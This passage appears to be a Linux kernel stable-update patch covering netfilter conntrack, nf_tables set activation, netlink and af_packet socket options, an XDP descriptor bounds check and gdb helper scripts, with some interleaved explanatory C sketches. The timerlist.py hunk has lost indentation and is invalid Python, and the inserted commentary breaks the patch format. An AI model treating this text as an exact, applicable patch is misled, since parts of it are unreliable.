+ 	cork->dst = NULL;
+ 	skb_dst_set(skb, &rt->dst);
+ 
+-	if (iph->protocol == IPPROTO_ICMP)
+-		icmp_out_count(net, ((struct icmphdr *)
+-			skb_transport_header(skb))->type);
++	if (iph->protocol == IPPROTO_ICMP) {
++		u8 icmp_type;
++
++		/* For such sockets, transhdrlen is zero when ip_append_data() is
++		 * called, so the icmphdr is not in the skb linear region and the
++		 * ICMP type cannot be read via icmp_hdr(skb)->type.
++		 */
++		if (sk->sk_type == SOCK_RAW && !inet_sk(sk)->hdrincl)
++			icmp_type = fl4->fl4_icmp_type;
++		else
++			icmp_type = icmp_hdr(skb)->type;
++		icmp_out_count(net, icmp_type);
++	}
+ 
+ 	ip_cork_release(cork);
+ out:
+diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c
+index e1ebf5e42ebe9..d94041bb42872 100644
+--- a/net/ipv6/ip6_input.c
++++ b/net/ipv6/ip6_input.c
+@@ -404,10 +404,6 @@ resubmit_final:
+ 			/* Only do this once for first final protocol */
+ 			have_final = true;
+ 
+-			/* Free reference early: we don't need it any more,
+-			   and it may hold ip_conntrack module loaded
+-			   indefinitely. */
+-			nf_reset_ct(skb);
+ 
+ 			skb_postpull_rcsum(skb, skb_network_header(skb),
+ 					   skb_network_header_len(skb));
+@@ -430,10 +426,12 @@ resubmit_final:
+ 				goto discard;
+ 			}
+ 		}
+-		if (!(ipprot->flags & INET6_PROTO_NOPOLICY) &&
+-		    !xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) {
+-			SKB_DR_SET(reason, XFRM_POLICY);
+-			goto discard;
++		if (!(ipprot->flags & INET6_PROTO_NOPOLICY)) {
++			if (!xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) {
++				SKB_DR_SET(reason, XFRM_POLICY);
++				goto discard;
++			}
++			nf_reset_ct(skb);
+ 		}
+ 
+ 		ret = INDIRECT_CALL_2(ipprot->handler, tcp_v6_rcv, udpv6_rcv,
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 4fc511bdf176c..f44b99f7ecdcc 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -193,10 +193,8 @@ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ 			struct sk_buff *clone = skb_clone(skb, GFP_ATOMIC);
+ 
+ 			/* Not releasing hash table! */
+-			if (clone) {
+-				nf_reset_ct(clone);
++			if (clone)
+ 				rawv6_rcv(sk, clone);
+-			}
+ 		}
+ 	}
+ 	rcu_read_unlock();
+@@ -387,6 +385,7 @@ int rawv6_rcv(struct sock *sk, struct sk_buff *skb)
+ 		kfree_skb(skb);
+ 		return NET_RX_DROP;
+ 	}
++	nf_reset_ct(skb);
+ 
+ 	if (!rp->checksum)
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index 81afb40bfc0bb..c563a84d67b46 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1722,6 +1722,8 @@ process:
+ 	if (drop_reason)
+ 		goto discard_and_relse;
+ 
++	nf_reset_ct(skb);
++
+ 	if (tcp_filter(sk, skb)) {
+ 		drop_reason = SKB_DROP_REASON_SOCKET_FILTER;
+ 		goto discard_and_relse;
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 0b8127988adb7..c029222ce46b0 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -701,6 +701,7 @@ static int udpv6_queue_rcv_one_skb(struct sock *sk, struct sk_buff *skb)
+ 		drop_reason = SKB_DROP_REASON_XFRM_POLICY;
+ 		goto drop;
+ 	}
++	nf_reset_ct(skb);
+ 
+ 	if (static_branch_unlikely(&udpv6_encap_needed_key) && up->encap_type) {
+ 		int (*encap_rcv)(struct sock *sk, struct sk_buff *skb);
+@@ -1024,6 +1025,7 @@ int __udp6_lib_rcv(struct sk_buff *skb, struct udp_table *udptable,
+ 
+ 	if (!xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb))
+ 		goto discard;
++	nf_reset_ct(skb);
+ 
+ 	if (udp_lib_checksum_complete(skb))
+ 		goto csum_error;
+diff --git a/net/netfilter/nf_conntrack_bpf.c b/net/netfilter/nf_conntrack_bpf.c
+index adae86e8e02e8..8639e7efd0e22 100644
+--- a/net/netfilter/nf_conntrack_bpf.c
++++ b/net/netfilter/nf_conntrack_bpf.c
+@@ -384,6 +384,7 @@ struct nf_conn *bpf_ct_insert_entry(struct nf_conn___init *nfct_i)
+ 	struct nf_conn *nfct = (struct nf_conn *)nfct_i;
+ 	int err;
+ 
++	nfct->status |= IPS_CONFIRMED;
+ 	err = nf_conntrack_hash_check_insert(nfct);
+ 	if (err < 0) {
+ 		nf_conntrack_free(nfct);
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 30ed45b1b57df..a0e9c7af08467 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -938,7 +938,6 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 		goto out;
+ 	}
+ 
+-	ct->status |= IPS_CONFIRMED;
+ 	smp_wmb();
+ 	/* The caller holds a reference to this object */
+ 	refcount_set(&ct->ct_general.use, 2);
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index d095d3c1ceca6..cb4325b8ebb11 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -176,7 +176,12 @@ nla_put_failure:
+ static int ctnetlink_dump_timeout(struct sk_buff *skb, const struct nf_conn *ct,
+ 				  bool skip_zero)
+ {
+-	long timeout = nf_ct_expires(ct) / HZ;
++	long timeout;
++
++	if (nf_ct_is_confirmed(ct))
++		timeout = nf_ct_expires(ct) / HZ;
++	else
++		timeout = ct->timeout / HZ;
+ 
+ 	if (skip_zero && timeout == 0)
+ 		return 0;
+@@ -2253,9 +2258,6 @@ ctnetlink_create_conntrack(struct net *net,
+ 	if (!cda[CTA_TIMEOUT])
+ 		goto err1;
+ 
+-	timeout = (u64)ntohl(nla_get_be32(cda[CTA_TIMEOUT])) * HZ;
+-	__nf_ct_set_timeout(ct, timeout);
+-
+ 	rcu_read_lock();
+  	if (cda[CTA_HELP]) {
+ 		char *helpname = NULL;
+@@ -2316,6 +2318,12 @@ ctnetlink_create_conntrack(struct net *net,
+ 	nfct_seqadj_ext_add(ct);
+ 	nfct_synproxy_ext_add(ct);
+ 
++	/* we must add conntrack extensions before confirmation. */
++	ct->status |= IPS_CONFIRMED;
++
++	timeout = (u64)ntohl(nla_get_be32(cda[CTA_TIMEOUT])) * HZ;
++	__nf_ct_set_timeout(ct, timeout);
++
+ 	if (cda[CTA_STATUS]) {
+ 		err = ctnetlink_change_status(ct, cda);
+ 		if (err < 0)
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 12d815b9aa131..f663262df6987 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -4936,12 +4936,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	}
+ }
+ 
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	if (nft_set_is_anonymous(set))
++		nft_clear(ctx->net, set);
++
++	set->use++;
++}
++EXPORT_SYMBOL_GPL(nf_tables_activate_set);
++
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
+ 	case NFT_TRANS_PREPARE:
++		if (nft_set_is_anonymous(set))
++			nft_deactivate_next(ctx->net, set);
++
+ 		set->use--;
+ 		return;
+ 	case NFT_TRANS_ABORT:
+@@ -8517,6 +8529,8 @@ static int nf_tables_validate(struct net *net)
+ 			if (nft_table_validate(net, table) < 0)
+ 				return -EAGAIN;
+ 		}
++
++		nft_validate_state_update(net, NFT_VALIDATE_SKIP);
+ 		break;
+ 	}
+ 
+@@ -9437,11 +9451,6 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 	return 0;
+ }
+ 
+-static void nf_tables_cleanup(struct net *net)
+-{
+-	nft_validate_state_update(net, NFT_VALIDATE_SKIP);
+-}
+-
+ static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+ 			   enum nfnl_abort_action action)
+ {
+@@ -9475,7 +9484,6 @@ static const struct nfnetlink_subsystem nf_tables_subsys = {
+ 	.cb		= nf_tables_cb,
+ 	.commit		= nf_tables_commit,
+ 	.abort		= nf_tables_abort,
+-	.cleanup	= nf_tables_cleanup,
+ 	.valid_genid	= nf_tables_valid_genid,
+ 	.owner		= THIS_MODULE,
+ };
+diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
+index 81c7737c803a6..ae7146475d17a 100644
+--- a/net/netfilter/nfnetlink.c
++++ b/net/netfilter/nfnetlink.c
+@@ -590,8 +590,6 @@ done:
+ 			goto replay_abort;
+ 		}
+ 	}
+-	if (ss->cleanup)
+-		ss->cleanup(net);
+ 
+ 	nfnl_err_deliver(&err_list, oskb);
+ 	kfree_skb(skb);
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index 6983e6ddeef90..e65a83328b554 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_dynset *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_dynset_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index d9ad1aa818564..68a5dea805480 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_lookup *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_lookup_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
+index 5d8d91b3904db..7f8e480b6be5b 100644
+--- a/net/netfilter/nft_objref.c
++++ b/net/netfilter/nft_objref.c
+@@ -184,7 +184,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_objref_map *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_objref_map_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index 99622c64081c4..b1dcc536521b6 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1731,7 +1731,8 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+-	int len, val, err;
++	unsigned int flag;
++	int len, val;
+ 
+ 	if (level != SOL_NETLINK)
+ 		return -ENOPROTOOPT;
+@@ -1743,39 +1744,17 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 
+ 	switch (optname) {
+ 	case NETLINK_PKTINFO:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_RECV_PKTINFO ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_RECV_PKTINFO;
+ 		break;
+ 	case NETLINK_BROADCAST_ERROR:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_BROADCAST_SEND_ERROR ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_BROADCAST_SEND_ERROR;
+ 		break;
+ 	case NETLINK_NO_ENOBUFS:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_RECV_NO_ENOBUFS ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_RECV_NO_ENOBUFS;
+ 		break;
+ 	case NETLINK_LIST_MEMBERSHIPS: {
+-		int pos, idx, shift;
++		int pos, idx, shift, err = 0;
+ 
+-		err = 0;
+ 		netlink_lock_table();
+ 		for (pos = 0; pos * 8 < nlk->ngroups; pos += sizeof(u32)) {
+ 			if (len - pos < sizeof(u32))
+@@ -1792,40 +1771,32 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 		if (put_user(ALIGN(nlk->ngroups / 8, sizeof(u32)), optlen))
+ 			err = -EFAULT;
+ 		netlink_unlock_table();
+-		break;
++		return err;
+ 	}
+ 	case NETLINK_CAP_ACK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_CAP_ACK ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_CAP_ACK;
+ 		break;
+ 	case NETLINK_EXT_ACK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_EXT_ACK ? 1 : 0;
+-		if (put_user(len, optlen) || put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_EXT_ACK;
+ 		break;
+ 	case NETLINK_GET_STRICT_CHK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_STRICT_CHK ? 1 : 0;
+-		if (put_user(len, optlen) || put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_STRICT_CHK;
+ 		break;
+ 	default:
+-		err = -ENOPROTOOPT;
++		return -ENOPROTOOPT;
+ 	}
+-	return err;
++
++	if (len < sizeof(int))
++		return -EINVAL;
++
++	len = sizeof(int);
++	val = nlk->flags & flag ? 1 : 0;
++
++	if (put_user(len, optlen) ||
++	    copy_to_user(optval, &val, len))
++		return -EFAULT;
++
++	return 0;
+ }
+ 
+ static void netlink_cmsg_recv_pktinfo(struct msghdr *msg, struct sk_buff *skb)
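
The netlink_getsockopt() rework above collapses six copy-pasted branches into "select a flag bit, then share one validated copy-out". A minimal user-space sketch of the same shape, with memcpy() standing in for put_user() and made-up option numbers and flag names:

#include <errno.h>
#include <string.h>

#define F_PKTINFO	(1u << 0)	/* illustrative flag bits */
#define F_CAP_ACK	(1u << 1)

int get_bool_opt(unsigned int flags, int optname, void *optval, int *optlen)
{
	unsigned int flag;
	int val;

	switch (optname) {
	case 1: flag = F_PKTINFO; break;
	case 2: flag = F_CAP_ACK; break;
	default: return -ENOPROTOOPT;
	}

	/* one shared length check and copy-out for every boolean option */
	if (*optlen < (int)sizeof(int))
		return -EINVAL;

	*optlen = sizeof(int);
	val = (flags & flag) ? 1 : 0;
	memcpy(optval, &val, sizeof(int));
	return 0;
}
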
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 1ab65f7f2a0ae..ac9335d76fb73 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -307,7 +307,8 @@ static void packet_cached_dev_reset(struct packet_sock *po)
+ 
+ static bool packet_use_direct_xmit(const struct packet_sock *po)
+ {
+-	return po->xmit == packet_direct_xmit;
++	/* Paired with WRITE_ONCE() in packet_setsockopt() */
++	return READ_ONCE(po->xmit) == packet_direct_xmit;
+ }
+ 
+ static u16 packet_pick_tx_queue(struct sk_buff *skb)
+@@ -2184,7 +2185,7 @@ static int packet_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	sll = &PACKET_SKB_CB(skb)->sa.ll;
+ 	sll->sll_hatype = dev->type;
+ 	sll->sll_pkttype = skb->pkt_type;
+-	if (unlikely(po->origdev))
++	if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV)))
+ 		sll->sll_ifindex = orig_dev->ifindex;
+ 	else
+ 		sll->sll_ifindex = dev->ifindex;
+@@ -2459,7 +2460,7 @@ static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	sll->sll_hatype = dev->type;
+ 	sll->sll_protocol = skb->protocol;
+ 	sll->sll_pkttype = skb->pkt_type;
+-	if (unlikely(po->origdev))
++	if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV)))
+ 		sll->sll_ifindex = orig_dev->ifindex;
+ 	else
+ 		sll->sll_ifindex = dev->ifindex;
+@@ -2866,7 +2867,8 @@ tpacket_error:
+ 		packet_inc_pending(&po->tx_ring);
+ 
+ 		status = TP_STATUS_SEND_REQUEST;
+-		err = po->xmit(skb);
++		/* Paired with WRITE_ONCE() in packet_setsockopt() */
++		err = READ_ONCE(po->xmit)(skb);
+ 		if (unlikely(err != 0)) {
+ 			if (err > 0)
+ 				err = net_xmit_errno(err);
+@@ -3069,7 +3071,8 @@ static int packet_snd(struct socket *sock, struct msghdr *msg, size_t len)
+ 		virtio_net_hdr_set_proto(skb, &vnet_hdr);
+ 	}
+ 
+-	err = po->xmit(skb);
++	/* Paired with WRITE_ONCE() in packet_setsockopt() */
++	err = READ_ONCE(po->xmit)(skb);
+ 	if (unlikely(err != 0)) {
+ 		if (err > 0)
+ 			err = net_xmit_errno(err);
+@@ -3512,7 +3515,7 @@ static int packet_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 		memcpy(msg->msg_name, &PACKET_SKB_CB(skb)->sa, copy_len);
+ 	}
+ 
+-	if (pkt_sk(sk)->auxdata) {
++	if (packet_sock_flag(pkt_sk(sk), PACKET_SOCK_AUXDATA)) {
+ 		struct tpacket_auxdata aux;
+ 
+ 		aux.tp_status = TP_STATUS_USER;
+@@ -3896,9 +3899,7 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		lock_sock(sk);
+-		po->auxdata = !!val;
+-		release_sock(sk);
++		packet_sock_flag_set(po, PACKET_SOCK_AUXDATA, val);
+ 		return 0;
+ 	}
+ 	case PACKET_ORIGDEV:
+@@ -3910,9 +3911,7 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		lock_sock(sk);
+-		po->origdev = !!val;
+-		release_sock(sk);
++		packet_sock_flag_set(po, PACKET_SOCK_ORIGDEV, val);
+ 		return 0;
+ 	}
+ 	case PACKET_VNET_HDR:
+@@ -4006,7 +4005,8 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		po->xmit = val ? packet_direct_xmit : dev_queue_xmit;
++		/* Paired with all lockless reads of po->xmit */
++		WRITE_ONCE(po->xmit, val ? packet_direct_xmit : dev_queue_xmit);
+ 		return 0;
+ 	}
+ 	default:
+@@ -4057,10 +4057,10 @@ static int packet_getsockopt(struct socket *sock, int level, int optname,
+ 
+ 		break;
+ 	case PACKET_AUXDATA:
+-		val = po->auxdata;
++		val = packet_sock_flag(po, PACKET_SOCK_AUXDATA);
+ 		break;
+ 	case PACKET_ORIGDEV:
+-		val = po->origdev;
++		val = packet_sock_flag(po, PACKET_SOCK_ORIGDEV);
+ 		break;
+ 	case PACKET_VNET_HDR:
+ 		val = po->has_vnet_hdr;
+diff --git a/net/packet/diag.c b/net/packet/diag.c
+index 07812ae5ca073..d704c7bf51b20 100644
+--- a/net/packet/diag.c
++++ b/net/packet/diag.c
+@@ -23,9 +23,9 @@ static int pdiag_put_info(const struct packet_sock *po, struct sk_buff *nlskb)
+ 	pinfo.pdi_flags = 0;
+ 	if (po->running)
+ 		pinfo.pdi_flags |= PDI_RUNNING;
+-	if (po->auxdata)
++	if (packet_sock_flag(po, PACKET_SOCK_AUXDATA))
+ 		pinfo.pdi_flags |= PDI_AUXDATA;
+-	if (po->origdev)
++	if (packet_sock_flag(po, PACKET_SOCK_ORIGDEV))
+ 		pinfo.pdi_flags |= PDI_ORIGDEV;
+ 	if (po->has_vnet_hdr)
+ 		pinfo.pdi_flags |= PDI_VNETHDR;
+diff --git a/net/packet/internal.h b/net/packet/internal.h
+index 48af35b1aed25..3bae8ea7a36f5 100644
+--- a/net/packet/internal.h
++++ b/net/packet/internal.h
+@@ -116,10 +116,9 @@ struct packet_sock {
+ 	int			copy_thresh;
+ 	spinlock_t		bind_lock;
+ 	struct mutex		pg_vec_lock;
++	unsigned long		flags;
+ 	unsigned int		running;	/* bind_lock must be held */
+-	unsigned int		auxdata:1,	/* writer must hold sock lock */
+-				origdev:1,
+-				has_vnet_hdr:1,
++	unsigned int		has_vnet_hdr:1, /* writer must hold sock lock */
+ 				tp_loss:1,
+ 				tp_tx_has_off:1;
+ 	int			pressure;
+@@ -144,4 +143,25 @@ static inline struct packet_sock *pkt_sk(struct sock *sk)
+ 	return (struct packet_sock *)sk;
+ }
+ 
++enum packet_sock_flags {
++	PACKET_SOCK_ORIGDEV,
++	PACKET_SOCK_AUXDATA,
++};
++
++static inline void packet_sock_flag_set(struct packet_sock *po,
++					enum packet_sock_flags flag,
++					bool val)
++{
++	if (val)
++		set_bit(flag, &po->flags);
++	else
++		clear_bit(flag, &po->flags);
++}
++
++static inline bool packet_sock_flag(const struct packet_sock *po,
++				    enum packet_sock_flags flag)
++{
++	return test_bit(flag, &po->flags);
++}
++
+ #endif
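
The conversion above replaces two one-bit bitfields, which share a word and therefore needed the socket lock for writes, with individual bits of an unsigned long driven through set_bit()/clear_bit()/test_bit(), which are atomic per bit. The same idea modeled with C11 atomics (the kernel helpers themselves are not reproduced here):

#include <stdatomic.h>
#include <stdbool.h>

enum sock_flags { SOCK_ORIGDEV, SOCK_AUXDATA };	/* illustrative names */

static void sock_flag_set(atomic_ulong *flags, enum sock_flags f, bool val)
{
	if (val)
		atomic_fetch_or(flags, 1UL << f);
	else
		atomic_fetch_and(flags, ~(1UL << f));
}

static bool sock_flag(atomic_ulong *flags, enum sock_flags f)
{
	return atomic_load(flags) & (1UL << f);
}
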
+diff --git a/net/sched/sch_fq.c b/net/sched/sch_fq.c
+index 48d14fb90ba02..f59a2cb2c803d 100644
+--- a/net/sched/sch_fq.c
++++ b/net/sched/sch_fq.c
+@@ -779,13 +779,17 @@ static int fq_resize(struct Qdisc *sch, u32 log)
+ 	return 0;
+ }
+ 
++static struct netlink_range_validation iq_range = {
++	.max = INT_MAX,
++};
++
+ static const struct nla_policy fq_policy[TCA_FQ_MAX + 1] = {
+ 	[TCA_FQ_UNSPEC]			= { .strict_start_type = TCA_FQ_TIMER_SLACK },
+ 
+ 	[TCA_FQ_PLIMIT]			= { .type = NLA_U32 },
+ 	[TCA_FQ_FLOW_PLIMIT]		= { .type = NLA_U32 },
+ 	[TCA_FQ_QUANTUM]		= { .type = NLA_U32 },
+-	[TCA_FQ_INITIAL_QUANTUM]	= { .type = NLA_U32 },
++	[TCA_FQ_INITIAL_QUANTUM]	= NLA_POLICY_FULL_RANGE(NLA_U32, &iq_range),
+ 	[TCA_FQ_RATE_ENABLE]		= { .type = NLA_U32 },
+ 	[TCA_FQ_FLOW_DEFAULT_RATE]	= { .type = NLA_U32 },
+ 	[TCA_FQ_FLOW_MAX_RATE]		= { .type = NLA_U32 },
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index fd7e1c630493e..d2ee566343083 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -2050,9 +2050,6 @@ call_bind_status(struct rpc_task *task)
+ 			status = -EOPNOTSUPP;
+ 			break;
+ 		}
+-		if (task->tk_rebind_retry == 0)
+-			break;
+-		task->tk_rebind_retry--;
+ 		rpc_delay(task, 3*HZ);
+ 		goto retry_timeout;
+ 	case -ENOBUFS:
+diff --git a/net/sunrpc/sched.c b/net/sunrpc/sched.c
+index be587a308e05a..c8321de341eea 100644
+--- a/net/sunrpc/sched.c
++++ b/net/sunrpc/sched.c
+@@ -817,7 +817,6 @@ rpc_init_task_statistics(struct rpc_task *task)
+ 	/* Initialize retry counters */
+ 	task->tk_garb_retry = 2;
+ 	task->tk_cred_retry = 2;
+-	task->tk_rebind_retry = 2;
+ 
+ 	/* starting timestamp */
+ 	task->tk_start = ktime_get();
+diff --git a/net/xdp/xsk_queue.h b/net/xdp/xsk_queue.h
+index c6fb6b7636582..bdeba20aaf8ff 100644
+--- a/net/xdp/xsk_queue.h
++++ b/net/xdp/xsk_queue.h
+@@ -161,6 +161,7 @@ static inline bool xp_unaligned_validate_desc(struct xsk_buff_pool *pool,
+ 		return false;
+ 
+ 	if (base_addr >= pool->addrs_cnt || addr >= pool->addrs_cnt ||
++	    addr + desc->len > pool->addrs_cnt ||
+ 	    xp_desc_crosses_non_contig_pg(pool, addr, desc->len))
+ 		return false;
+ 
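
The xsk_queue check above now also rejects descriptors whose end (addr + desc->len) runs past the pool, not only those whose start is out of range. A freestanding version of the bounds test; the subtraction form is the overflow-safe way to write it when addr + len could wrap:

#include <stdbool.h>
#include <stdint.h>

bool desc_in_bounds(uint64_t addr, uint32_t len, uint64_t pool_size)
{
	if (addr >= pool_size)
		return false;
	/* len <= pool_size - addr avoids overflow in addr + len */
	return len <= pool_size - addr;
}
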
+diff --git a/scripts/gdb/linux/clk.py b/scripts/gdb/linux/clk.py
+index 061aecfa294e6..7a01fdc3e8446 100644
+--- a/scripts/gdb/linux/clk.py
++++ b/scripts/gdb/linux/clk.py
+@@ -41,6 +41,8 @@ are cached and potentially out of date"""
+             self.show_subtree(child, level + 1)
+ 
+     def invoke(self, arg, from_tty):
++        if utils.gdb_eval_or_none("clk_root_list") is None:
++            raise gdb.GdbError("No clocks registered")
+         gdb.write("                                 enable  prepare  protect               \n")
+         gdb.write("   clock                          count    count    count        rate   \n")
+         gdb.write("------------------------------------------------------------------------\n")
+diff --git a/scripts/gdb/linux/constants.py.in b/scripts/gdb/linux/constants.py.in
+index 2efbec6b6b8db..08f0587d15ea1 100644
+--- a/scripts/gdb/linux/constants.py.in
++++ b/scripts/gdb/linux/constants.py.in
+@@ -39,6 +39,8 @@
+ 
+ import gdb
+ 
++LX_CONFIG(CONFIG_DEBUG_INFO_REDUCED)
++
+ /* linux/clk-provider.h */
+ if IS_BUILTIN(CONFIG_COMMON_CLK):
+     LX_GDBPARSED(CLK_GET_RATE_NOCACHE)
+diff --git a/scripts/gdb/linux/genpd.py b/scripts/gdb/linux/genpd.py
+index 39cd1abd85590..b53649c0a77a6 100644
+--- a/scripts/gdb/linux/genpd.py
++++ b/scripts/gdb/linux/genpd.py
+@@ -5,7 +5,7 @@
+ import gdb
+ import sys
+ 
+-from linux.utils import CachedType
++from linux.utils import CachedType, gdb_eval_or_none
+ from linux.lists import list_for_each_entry
+ 
+ generic_pm_domain_type = CachedType('struct generic_pm_domain')
+@@ -70,6 +70,8 @@ Output is similar to /sys/kernel/debug/pm_genpd/pm_genpd_summary'''
+             gdb.write('    %-50s  %s\n' % (kobj_path, rtpm_status_str(dev)))
+ 
+     def invoke(self, arg, from_tty):
++        if gdb_eval_or_none("&gpd_list") is None:
++            raise gdb.GdbError("No power domain(s) registered")
+         gdb.write('domain                          status          children\n');
+         gdb.write('    /device                                             runtime status\n');
+         gdb.write('----------------------------------------------------------------------\n');
+diff --git a/scripts/gdb/linux/timerlist.py b/scripts/gdb/linux/timerlist.py
+index 071d0dd5a6349..51def847f1ef9 100644
+--- a/scripts/gdb/linux/timerlist.py
++++ b/scripts/gdb/linux/timerlist.py
+@@ -73,7 +73,7 @@ def print_cpu(hrtimer_bases, cpu, max_clock_bases):
+     ts = cpus.per_cpu(tick_sched_ptr, cpu)
+ 
+     text = "cpu: {}\n".format(cpu)
+-    for i in xrange(max_clock_bases):
++    for i in range(max_clock_bases):
+         text += " clock {}:\n".format(i)
+         text += print_base(cpu_base['clock_base'][i])
+ 
+@@ -158,6 +158,8 @@ def pr_cpumask(mask):
+     num_bytes = (nr_cpu_ids + 7) / 8
+     buf = utils.read_memoryview(inf, bits, num_bytes).tobytes()
+     buf = binascii.b2a_hex(buf)
++    if type(buf) is not str:
++    buf = buf.decode()
+ 
+     chunks = []
+     i = num_bytes
+diff --git a/scripts/gdb/linux/utils.py b/scripts/gdb/linux/utils.py
+index 1553f68716cc2..7f36aee32ac66 100644
+--- a/scripts/gdb/linux/utils.py
++++ b/scripts/gdb/linux/utils.py
+@@ -88,7 +88,10 @@ def get_target_endianness():
+ 
+ 
+ def read_memoryview(inf, start, length):
+-    return memoryview(inf.read_memory(start, length))
++    m = inf.read_memory(start, length)
++    if type(m) is memoryview:
++        return m
++    return memoryview(m)
+ 
+ 
+ def read_u16(buffer, offset):
+diff --git a/scripts/gdb/vmlinux-gdb.py b/scripts/gdb/vmlinux-gdb.py
+index 3e8d3669f0ce0..5564ffe8ae327 100644
+--- a/scripts/gdb/vmlinux-gdb.py
++++ b/scripts/gdb/vmlinux-gdb.py
+@@ -22,6 +22,10 @@ except:
